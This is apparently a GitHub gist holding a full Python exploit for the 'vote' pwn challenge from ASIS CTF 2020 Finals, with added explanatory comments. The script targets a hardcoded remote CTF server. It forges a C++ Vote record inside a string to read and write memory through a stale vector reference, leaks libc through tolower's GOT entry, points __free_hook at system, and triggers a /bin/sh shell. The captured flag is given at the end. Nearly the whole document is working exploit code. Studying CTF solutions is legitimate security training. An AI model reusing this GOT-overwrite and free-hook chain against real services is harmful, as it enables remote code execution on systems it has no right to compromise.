@ptr-yudai
Created December 9, 2020 15:59
ASIS CTF 2020 Finals - vote
from ptrlib import *
"""
typedef struct {
unsigned long id;
std::string candidate;
std::string state;
std::string gender;
long age;
bool employed;
} Vote;
"""
def vote(employed, age, gender, state, candidate):
    """Cast a vote through menu option 5 and return the id the service assigns.

    Args:
        employed: truthy answers ``y`` to the employment prompt, falsy ``n``.
        age: sent as ``str(age)``.
        gender, state, candidate: sent verbatim (``str`` or ``bytes``); the
            exploit stages later in this file pass a forged record as
            ``candidate``.

    Returns:
        The vote id parsed as hex from the text after ``"ID is "``, with the
        last character dropped (presumably trailing punctuation -- not
        visible here).

    Uses the module-level ``sock`` connection.
    """
    sock.sendlineafter("> ", "5")
    # Each field is prompted on its own line: swallow the prompt, then answer.
    answers = (
        'y' if employed else 'n',
        str(age),
        gender,
        state,
        candidate,
    )
    for answer in answers:
        sock.recvline()
        sock.sendline(answer)
    return int(sock.recvlineafter("ID is ")[:-1], 16)
def update(voteid, gender):
    """Replace the gender field of vote *voteid* via menu option 4.

    Args:
        voteid: id as returned by :func:`vote`; transmitted in ``hex()`` form.
        gender: replacement value, sent verbatim.

    Returns:
        Whatever the service echoes after ``": "`` as the previous value.
        The exploit below relies on that echo to read memory through a
        forged string pointer.

    Uses the module-level ``sock`` connection.
    """
    sock.sendlineafter("> ", "4")
    sock.sendlineafter(": ", hex(voteid))
    previous = sock.recvlineafter(": ")
    # One more line is printed before the new value is accepted.
    sock.recvline()
    sock.sendline(gender)
    return previous
def delete(voteid):
    """Remove vote *voteid* via menu option 3.

    Not called anywhere in this script; kept as part of the menu wrapper set.
    Uses the module-level ``sock`` connection.
    """
    for prompt, reply in (("> ", "3"), (": ", hex(voteid))):
        sock.sendlineafter(prompt, reply)
import random
import string
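def randstr(n):
    """Return a string of *n* pseudo-random ASCII letters.

    Not used anywhere in this script.  ``random`` is not a CSPRNG, so this is
    only suitable for throwaway filler input, never for anything that must be
    unpredictable.

    Args:
        n: number of characters to produce; ``n <= 0`` yields ``""``.

    Returns:
        A ``str`` of length ``max(n, 0)`` drawn from ``string.ascii_letters``.
    """
    # A def instead of a named lambda (PEP 8 E731); the generator feeds
    # str.join directly so no intermediate list is built.
    return ''.join(random.choice(string.ascii_letters) for _ in range(n))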
elf = ELF("./vote")  # challenge binary; used below for GOT symbol lookups
# Local-debug configuration, parked inside a bare string so it never executes.
# The '#"""' line further down appears to be the other half of a toggle:
# commenting out the opening '"""' makes these two lines live and turns the
# remote pair below into the dead string instead.
"""
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
sock = Process("./vote")
"""
libc = ELF("libc6_2.27-3ubuntu1.4_amd64.so")  # libc shipped with the challenge; 2.27 still has the malloc hooks the chain below relies on
sock = Socket("69.90.132.248", 3371)          # remote CTF instance used during the event
#"""
votes = []  # ids returned by the padding votes; only appended to, never read
rop_nop = 0x0040201a  # address inside the main binary; written over tolower's GOT slot after the leak (name suggests a harmless gadget -- confirm against the binary)
# --- Stage 0: grow the vote container ---------------------------------------
# The author's comment says this forces a reallocation; the flag text at the
# bottom ("vote vector never get updated") suggests the underlying bug is a
# stale reference into the storage that existed before that reallocation.
# NOTE(review): why 0x33 votes, and what is later reused, is not visible in
# this script -- confirm against the binary.
# reallocate votes
logger.info("Reallocating...")
for i in range(0x33):
    votes.append(vote(True, 0xdead, "AAAAAAAA", "BBBBBBBB", "CCCCCCCC"))
# --- Stage 1: libc leak -------------------------------------------------------
# The candidate string is built to contain a forged Vote record (layout per the
# typedef at the top of the file).  Each std::string is written as four qwords:
# data pointer, length, then 16 bytes that hold either the capacity or the
# in-object (SSO) buffer.
# libc leak
logger.info("Leaking...")
payload = b"A" * 0x98  # offset of the forged record inside the string; presumably where the stale storage overlaps this buffer -- unverified
payload += p64(0xdeadbeefcafebabe) # voteid  -- unique id so update() selects this forged record
payload += p64(0xffffffffcafebabe) # candidate -- non-canonical pointer; the chain only works if the program never dereferences it
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0xffffffffdeadbeef) # state -- likewise a placeholder pointer
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(elf.got('tolower')) # gender -- data pointer aimed at the GOT slot of tolower
payload += p64(8)  # length 8: exactly one pointer is echoed back and then overwritten
payload += p64(8)  # capacity 8: presumably so the 8-byte replacement is copied in place instead of reallocated -- confirm
payload += b"0" * (0xf8 - len(payload))  # pad to 0xf8 bytes; here the record already ends at 0xf8, so this adds nothing (it matters for the second payload)
vote(True, 0xcafe, "A", "B", payload)
# update() on the forged id echoes the old gender, i.e. the 8 bytes stored at
# tolower's GOT entry (its libc address), then writes p64(rop_nop) over that
# slot.  Rebasing with the symbol offset from the matching libc gives the base.
# Mitigation note: a writable GOT implies partial RELRO; full RELRO would have
# stopped the write here (the read-only leak would still work).
libc_base = u64(update(0xdeadbeefcafebabe, p64(rop_nop))) - libc.symbol("tolower")
logger.info("libc = " + hex(libc_base))
# --- Stage 2: point __free_hook at system ------------------------------------
# Same forged-record trick with a different id and a different prefix length;
# presumably the stale storage now overlaps the buffer at another offset.
# glibc removed __free_hook in 2.34, so this stage is specific to the 2.27
# libc loaded above.
# overwrite free hook
logger.info("Pwning...")
payload = b"B" * 0x20
payload += p64(0xcafebabedeadbeef) # voteid -- distinct from the first forged id
payload += p64(0xffffffffcafebabe) # candidate
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0xffffffffdeadbeef) # state
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(libc_base + libc.symbol("__free_hook")) # gender -- data pointer aimed at the hook
payload += p64(0xf)  # length/capacity 0xf: an 8-byte write still fits, presumably keeping the copy in place -- confirm
payload += p64(0xf)
payload += b"0" * (0xf8 - len(payload))  # 0x78 bytes of padding: keeps this string the same size as the first payload
vote(True, 0xcafe, "A", "B", payload)
update(0xcafebabedeadbeef, p64(libc_base + libc.symbol("system")))  # __free_hook = system
# --- Stage 3: trigger ---------------------------------------------------------
# A genuine vote, then a gender update whose text starts with "/bin/sh".  Some
# free() of a buffer holding that text presumably fires the hook; which free it
# is cannot be seen from this script.
voteid = vote(True, 0xcafe, "A", "B", "C")
update(voteid, "/bin/sh\0" * 4)
sock.interactive()
# Flag obtained during the event; its text hints at the root cause.
# ASIS{v0t3_vEc7Or_Nev3R_93T_uPd4t3D!!}